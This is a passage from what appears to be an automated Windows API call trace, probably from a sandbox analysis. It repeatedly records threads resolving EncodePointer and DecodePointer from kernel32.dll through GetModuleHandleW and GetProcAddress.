pbstr=0x10b4f78c*="KERNEL32.DLL") returned 1 [0199.028] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.029] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.032] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.032] SysReAllocStringLen (in: pbstr=0x10b4f768*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10b4f768*="KERNEL32.DLL") returned 1 [0199.032] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.033] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.036] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0199.039] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.767] SysReAllocStringLen (in: pbstr=0x10b4fa40*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10b4fa40*="KERNEL32.DLL") returned 1 [0200.767] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.771] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 220 os_tid = 0xcc [0200.224] SysReAllocStringLen (in: pbstr=0x10d0f89c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10d0f89c*="KERNEL32.DLL") returned 1 [0200.225] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.229] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.229] SysReAllocStringLen (in: pbstr=0x10d0f89c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10d0f89c*="KERNEL32.DLL") returned 1 [0200.229] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.230] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.233] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.233] SysReAllocStringLen (in: pbstr=0x10d0f878*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10d0f878*="KERNEL32.DLL") returned 1 [0200.233] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.234] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.237] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0200.242] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.773] SysReAllocStringLen (in: pbstr=0x10d0fb50*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10d0fb50*="KERNEL32.DLL") returned 1 [0200.773] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.774] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.777] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 221 os_tid = 0xd4 [0200.780] SysReAllocStringLen (in: pbstr=0x959f4fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f4fc*="KERNEL32.DLL") returned 1 [0200.780] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.780] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.783] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.784] SysReAllocStringLen (in: pbstr=0x959f4fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f4fc*="KERNEL32.DLL") returned 1 [0200.784] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.788] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.788] SysReAllocStringLen (in: pbstr=0x959f4d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f4d8*="KERNEL32.DLL") returned 1 [0200.788] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.789] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.792] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0200.795] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.797] SysReAllocStringLen (in: pbstr=0x959f7b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959f7b0*="KERNEL32.DLL") returned 1 [0200.797] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.801] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 222 os_tid = 0xd8 [0201.152] SysReAllocStringLen (in: pbstr=0x961f41c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x961f41c*="KERNEL32.DLL") returned 1 [0201.152] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.153] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.156] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.156] SysReAllocStringLen (in: pbstr=0x961f41c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x961f41c*="KERNEL32.DLL") returned 1 [0201.156] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.157] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.160] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.160] SysReAllocStringLen (in: pbstr=0x961f3f8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x961f3f8*="KERNEL32.DLL") returned 1 [0201.160] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.161] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.164] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0201.167] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0201.442] SysReAllocStringLen (in: pbstr=0x961f6d0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x961f6d0*="KERNEL32.DLL") returned 1 [0201.442] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0201.442] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0201.446] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 224 os_tid = 0xe4 [0203.021] SysReAllocStringLen (in: pbstr=0x643fb14*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x643fb14*="KERNEL32.DLL") returned 1 [0203.021] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.021] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.024] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.024] SysReAllocStringLen (in: pbstr=0x643fb14*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x643fb14*="KERNEL32.DLL") returned 1 [0203.024] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.024] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.027] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.027] SysReAllocStringLen (in: pbstr=0x643faf0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x643faf0*="KERNEL32.DLL") returned 1 [0203.027] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.027] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.030] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0203.032] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.344] SysReAllocStringLen (in: pbstr=0x643fdc8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x643fdc8*="KERNEL32.DLL") returned 1 [0203.344] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.344] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.347] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 225 os_tid = 0xe8 [0203.281] SysReAllocStringLen (in: pbstr=0x95ff9ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95ff9ac*="KERNEL32.DLL") returned 1 [0203.281] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.282] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.285] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.285] SysReAllocStringLen (in: pbstr=0x95ff9ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95ff9ac*="KERNEL32.DLL") returned 1 [0203.285] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.285] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.288] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.288] SysReAllocStringLen (in: pbstr=0x95ff988*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95ff988*="KERNEL32.DLL") returned 1 [0203.288] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.292] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0203.294] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.765] SysReAllocStringLen (in: pbstr=0x95ffc60*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95ffc60*="KERNEL32.DLL") returned 1 [0203.765] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.766] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.769] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 226 os_tid = 0xec [0203.421] SysReAllocStringLen (in: pbstr=0x10c3f404*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10c3f404*="KERNEL32.DLL") returned 1 [0203.421] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.421] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.424] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.424] SysReAllocStringLen (in: pbstr=0x10c3f404*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10c3f404*="KERNEL32.DLL") returned 1 [0203.424] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.424] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.427] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.427] SysReAllocStringLen (in: pbstr=0x10c3f3e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10c3f3e0*="KERNEL32.DLL") returned 1 [0203.427] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.427] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.430] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0203.432] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.969] SysReAllocStringLen (in: pbstr=0x10c3f6b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10c3f6b8*="KERNEL32.DLL") returned 1 [0203.969] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.970] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.972] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 227 os_tid = 0xb10 [0203.912] SysReAllocStringLen (in: pbstr=0x730f4fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x730f4fc*="KERNEL32.DLL") returned 1 [0203.912] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.913] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.916] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.917] SysReAllocStringLen (in: pbstr=0x730f4fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x730f4fc*="KERNEL32.DLL") returned 1 [0203.917] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.920] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0203.921] SysReAllocStringLen (in: pbstr=0x730f4d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x730f4d8*="KERNEL32.DLL") returned 1 [0203.921] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0203.921] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.924] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0203.927] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.074] SysReAllocStringLen (in: pbstr=0x730f7b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x730f7b0*="KERNEL32.DLL") returned 1 [0204.075] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.078] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 228 os_tid = 0xb50 [0204.228] SysReAllocStringLen (in: pbstr=0x95af734*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95af734*="KERNEL32.DLL") returned 1 [0204.228] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.229] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.232] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.232] SysReAllocStringLen (in: pbstr=0x95af734*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95af734*="KERNEL32.DLL") returned 1 [0204.232] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.233] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.235] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.235] SysReAllocStringLen (in: pbstr=0x95af710*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95af710*="KERNEL32.DLL") returned 1 [0204.235] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.235] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.238] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0204.240] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0204.242] SysReAllocStringLen (in: pbstr=0x95af9e8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95af9e8*="KERNEL32.DLL") returned 1 [0204.242] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0204.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.245] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 229 os_tid = 0xb48 [0205.870] SysReAllocStringLen (in: pbstr=0x969f694*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f694*="KERNEL32.DLL") returned 1 [0205.870] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.874] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.875] SysReAllocStringLen (in: pbstr=0x969f694*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f694*="KERNEL32.DLL") returned 1 [0205.875] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.875] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.878] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.878] SysReAllocStringLen (in: pbstr=0x969f670*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f670*="KERNEL32.DLL") returned 1 [0205.878] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.879] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.882] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0205.885] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.677] SysReAllocStringLen (in: pbstr=0x969f948*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f948*="KERNEL32.DLL") returned 1 [0209.677] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.693] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 230 os_tid = 0xb60 [0205.889] SysReAllocStringLen (in: pbstr=0x12bef914*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12bef914*="KERNEL32.DLL") returned 1 [0205.889] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.890] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.893] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.893] SysReAllocStringLen (in: pbstr=0x12bef914*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12bef914*="KERNEL32.DLL") returned 1 [0205.894] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.897] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0205.897] SysReAllocStringLen (in: pbstr=0x12bef8f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12bef8f0*="KERNEL32.DLL") returned 1 [0205.897] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.898] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.901] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0205.904] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.695] SysReAllocStringLen (in: pbstr=0x12befbc8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12befbc8*="KERNEL32.DLL") returned 1 [0209.695] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.698] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 231 os_tid = 0xbac [0206.104] SysReAllocStringLen (in: pbstr=0x12dff55c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dff55c*="KERNEL32.DLL") returned 1 [0206.104] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.105] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.108] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.109] SysReAllocStringLen (in: pbstr=0x12dff55c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dff55c*="KERNEL32.DLL") returned 1 [0206.109] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.109] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.111] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.112] SysReAllocStringLen (in: pbstr=0x12dff538*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dff538*="KERNEL32.DLL") returned 1 [0206.112] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0206.112] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0206.114] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.117] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.701] SysReAllocStringLen (in: pbstr=0x12dff810*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dff810*="KERNEL32.DLL") returned 1 [0209.701] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.702] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.705] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 232 os_tid = 0xaa0 [0212.101] SysReAllocStringLen (in: pbstr=0x962f9ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x962f9ec*="KERNEL32.DLL") returned 1 [0212.101] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.103] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.106] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.106] SysReAllocStringLen (in: pbstr=0x962f9ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x962f9ec*="KERNEL32.DLL") returned 1 [0212.106] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.109] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.110] SysReAllocStringLen (in: pbstr=0x962f9c8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x962f9c8*="KERNEL32.DLL") returned 1 [0212.110] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.110] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.113] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0212.115] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0216.518] SysReAllocStringLen (in: pbstr=0x962fca0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x962fca0*="KERNEL32.DLL") returned 1 [0216.518] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0216.523] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0216.527] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 233 os_tid = 0xbbc [0212.252] SysReAllocStringLen (in: pbstr=0x973facc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x973facc*="KERNEL32.DLL") returned 1 [0212.252] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.253] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.256] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.256] SysReAllocStringLen (in: pbstr=0x973facc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x973facc*="KERNEL32.DLL") returned 1 [0212.256] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.257] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.260] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.260] SysReAllocStringLen (in: pbstr=0x973faa8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x973faa8*="KERNEL32.DLL") returned 1 [0212.260] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.261] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.263] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0212.266] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0216.531] SysReAllocStringLen (in: pbstr=0x973fd80*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x973fd80*="KERNEL32.DLL") returned 1 [0216.531] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0216.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0216.534] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 234 os_tid = 0x270 [0212.299] SysReAllocStringLen (in: pbstr=0x12c4fafc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12c4fafc*="KERNEL32.DLL") returned 1 [0212.299] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.299] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.302] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.303] SysReAllocStringLen (in: pbstr=0x12c4fafc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12c4fafc*="KERNEL32.DLL") returned 1 [0212.303] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.305] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.306] SysReAllocStringLen (in: pbstr=0x12c4fad8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12c4fad8*="KERNEL32.DLL") returned 1 [0212.306] CharLowerBuffW (in: 